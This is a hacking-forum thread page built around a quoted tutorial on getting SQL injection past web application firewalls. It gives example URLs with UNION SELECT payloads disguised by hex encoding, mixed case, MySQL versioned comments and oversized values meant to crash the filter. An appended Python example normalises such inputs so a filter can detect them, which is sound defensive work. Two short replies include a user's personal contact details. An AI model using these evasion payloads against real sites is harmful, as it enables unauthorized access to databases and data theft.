

WAF Bypassing Methods



09-15-2013, 08:52 PM #11
Sizziling Leet Offline Any problem of iphone ipad ipod ask me ! *****
Respected
Posts:469 Threads:53 Joined:Aug 2013 Reputation: 1
Mood: None
lol bro nice






Code name : Sizziling Leet Haxor

Contact : [email protected]


Facebook
https://www.facebook.com/david.daniel.90857901 I changed my account so please bros add me there


ReGarD's





11-06-2013, 01:58 AM #12
VIRkid Offline MadLeets Vip ******
V.I.P
Posts:62 Threads:9 Joined:Oct 2013 Reputation: 9
Mood: Blessed
thanks for the nice share

07-05-2017, 02:09 AM #13
833M0L3 Offline Junior Member **
Registered
Posts:6 Threads:0 Joined:Jul 2017 Reputation: 0
Mood: None
(08-29-2013, 11:10 PM)KinG_HaXoR(PHC) Wrote: hi mads; this is King_Haxor for u
hope u will enjoy my tut
this is on WAF bypassing, many people do not know what this is
So let's 1st know about WAF.

WHAT IS W.A.F


A web application firewall (WAF) is an
appliance, server plugin, or filter that applies a set of rules to an
HTTP conversation. Generally, these rules cover common attacks such as
Cross-site Scripting (XSS) and SQL Injection. By customizing the rules
to your application, many attacks can be identified and blocked. The
effort to perform this customization can be significant and needs to be
maintained as the application is modified.






How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a
command used for SQL Injections (usually the “UNION SELECT” command),
you get a 403 Error (and the website says “Forbidden” or “Not
Acceptable”).


Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….

(We get a 403 Error!)





Advanced Methods:

1. Buffer Overflow / Firewall Crash:

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….



(( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….



If you get a 500, you can exploit it using the Buffer Overflow Method! ))




2. Replace Characters with their HEX Values:

We can replace some characters with their HEX (URL-Encoded) Values.

Example:

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

(which means “union select”)




Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.online-toolz.com/tools/text-hex-convertor.php


3. Use other Variables or Commands instead of the common ones for SQLi:

Apart from the “UNION SELECT” other commands might be blocked.

Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()


4. Misc Exploitable Functions:

Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):

Example:

This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

http://www.site.com/index.php?page_id=-1...t+1,2,3,4…

(If the Firewall removes the “*”, the result will be: 15+union+select….)

5. Caps and LowerCase

-15+(uNioN)+(sElECt)….

-15+(uNioN+SeleCT)+…

-15+(UnI)(oN)+(SeL)(ecT)+….

-15+union (select 1,2,3,4…)
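
From the defender's side, the encodings quoted in post #13 (URL-encoded letters, mixed case, MySQL /*!...*/ comments, grouping parentheses, oversize values) all depend on a filter matching the raw request bytes instead of the form the database will parse. The Python below is an added example, not code from the thread or from any WAF product; the 512-character limit, the three decoding rounds and the names canonicalise and verdict are assumptions.

```python
import re
from urllib.parse import unquote_plus

MAX_LEN = 512  # assumed per-parameter limit; tune per application
MAX_ROUNDS = 3  # assumed bound on nested URL-encoding

# MySQL runs the body of /*!...*/ and /*!50000...*/, so keep the body.
_VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Ordinary /*...*/ comments separate tokens the way whitespace does.
_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")


def canonicalise(raw: str) -> str:
    """Reduce one parameter value to a single form, for matching only."""
    value = raw
    for _ in range(MAX_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    else:
        raise ValueError("URL-encoding nested too deeply")
    value = _VERSIONED.sub(r" \1 ", value)
    value = _COMMENT.sub(" ", value)
    value = re.sub(r"[()]", " ", value)  # parentheses must not hide keywords
    return re.sub(r"\s+", " ", value.lower()).strip()


def verdict(raw: str) -> str:
    """Return 'allow' or 'block:<reason>' for one raw parameter value."""
    if len(raw) > MAX_LEN:
        return "block:oversize"  # fail closed; never skip inspection
    try:
        canon = canonicalise(raw)
    except ValueError:
        return "block:nested-encoding"
    if _UNION_SELECT.search(canon):
        return "block:union-select"
    return "allow"


# Constructed samples using the forms quoted in the thread, plus benign values.
SAMPLES = ["15", "student union selection", "-15+(uNioN)+(sElECt)",
           "-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4", "A" * 1000]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{verdict(sample):22} {sample[:40]}")
```

verdict() only ever allows or blocks the original value and never forwards a rewritten one, because a filter that deletes characters and passes the result on (item 4 in the post) reassembles the keyword itself.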





